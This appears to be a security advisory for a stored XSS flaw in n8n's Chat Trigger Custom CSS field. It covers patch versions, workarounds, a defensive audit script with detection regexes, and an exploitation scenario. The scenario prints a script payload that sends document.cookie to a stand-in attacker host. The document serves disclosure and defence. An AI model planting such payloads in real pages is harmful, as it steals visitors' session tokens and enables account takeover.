n8n: Stored XSS in Chat Trigger via CSS injection
Any n8n deployment running the Chat Trigger node (LangChain integration) with a public chat URL is actively exposing all visitors to stored XSS — a workflow editor with legitimate credentials can silently backdoor every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | < 1.123.27 | 1.123.27 |
Do you use n8n? You're affected.
Recommended Action
1. PATCH: Upgrade to n8n 1.123.27 (v1 branch), 2.13.3, or 2.14.1 immediately; this is the only full remediation.
2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC; audit current role assignments now.
3. DISABLE NODE: Set NODES_EXCLUDE=@n8n/n8n-nodes-langchain.chatTrigger in the environment to block Chat Trigger instantiation.
4. AUDIT: Grep existing workflow JSON exports for <script, javascript:, onerror, or base64 payloads in Custom CSS fields.
5. ROTATE: Invalidate all active chat session tokens after patching.
6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.
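A starting point for the AUDIT step above, written here as an added example and not n8n project code: it walks an exported workflow, picks out Chat Trigger nodes by the node type string from the NODES_EXCLUDE workaround, and flags any Custom CSS value that contains markup or the indicators listed. The field path `parameters.options.customCss` and the sample export are assumptions constructed for the example.

```javascript
// Added example (not n8n project code): audit an exported n8n workflow for
// Chat Trigger nodes whose Custom CSS carries markup or script-like content.
// ASSUMPTION: the Custom CSS value lives at parameters.options.customCss.
const CHAT_TRIGGER_TYPE = '@n8n/n8n-nodes-langchain.chatTrigger';

// Indicators from the advisory's audit step, plus a generic "any HTML tag"
// check: a CSS field has no legitimate reason to contain markup at all.
const INDICATORS = [
  { name: 'html-tag', re: /<\s*[a-z!/]/i },
  { name: 'script-tag', re: /<\s*script/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'base64-blob', re: /base64,[A-Za-z0-9+/=]{20,}/ },
];

// Return the Custom CSS string of a node, or '' when the field is absent.
function customCssOf(node) {
  const opts = node && node.parameters && node.parameters.options;
  return opts && typeof opts.customCss === 'string' ? opts.customCss : '';
}

// One finding per Chat Trigger node whose CSS matches at least one indicator.
function auditWorkflow(workflow) {
  const findings = [];
  for (const node of workflow.nodes || []) {
    if (node.type !== CHAT_TRIGGER_TYPE) continue;
    const css = customCssOf(node);
    const hits = INDICATORS.filter((i) => i.re.test(css)).map((i) => i.name);
    if (hits.length) findings.push({ node: node.name, indicators: hits });
  }
  return findings;
}

// Constructed sample export: a clean Chat Trigger, a tampered one, and an
// unrelated node that the audit must ignore.
const SAMPLE_EXPORT = {
  name: 'support-chat',
  nodes: [
    { name: 'Chat Trigger clean', type: CHAT_TRIGGER_TYPE,
      parameters: { options: { customCss: ':root { --chat--color-primary: #e74266; }' } } },
    { name: 'Chat Trigger tampered', type: CHAT_TRIGGER_TYPE,
      parameters: { options: { customCss: 'body{}</style><img src=x onerror="console.log(1)">' } } },
    { name: 'HTTP Request', type: 'n8n-nodes-base.httpRequest', parameters: {} },
  ],
};

console.log(JSON.stringify(auditWorkflow(SAMPLE_EXPORT), null, 2));
```

Run it against each exported workflow file (e.g. `JSON.parse(fs.readFileSync(path))`) and treat any finding as a node to inspect by hand, since the regexes are deliberately broad.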
Technical Details
NVD Description
## Impact

An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected.

## Patches

The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability.

## Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations:

- Limit workflow creation and editing permissions to fully trusted users only.
- Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and injects <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> into the Custom CSS field. The sanitize-html misconfiguration fails to strip the tag. The workflow is saved and published — the payload now lives in the persistent workflow configuration. A customer service agent, external user, or automated integration that opens the public chat URL executes the script automatically, exfiltrating the session token to the attacker. The attacker replays the token to authenticate as that user, accesses the n8n instance or any downstream AI service the chat was proxying (LLM API, RAG knowledge base, CRM integration), and pivots further through the connected workflow toolchain without triggering additional alerts.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
References
- github.com/advisories/GHSA-3c7f-5hgj-h279
- github.com/n8n-io/n8n/security/advisories/GHSA-3c7f-5hgj-h279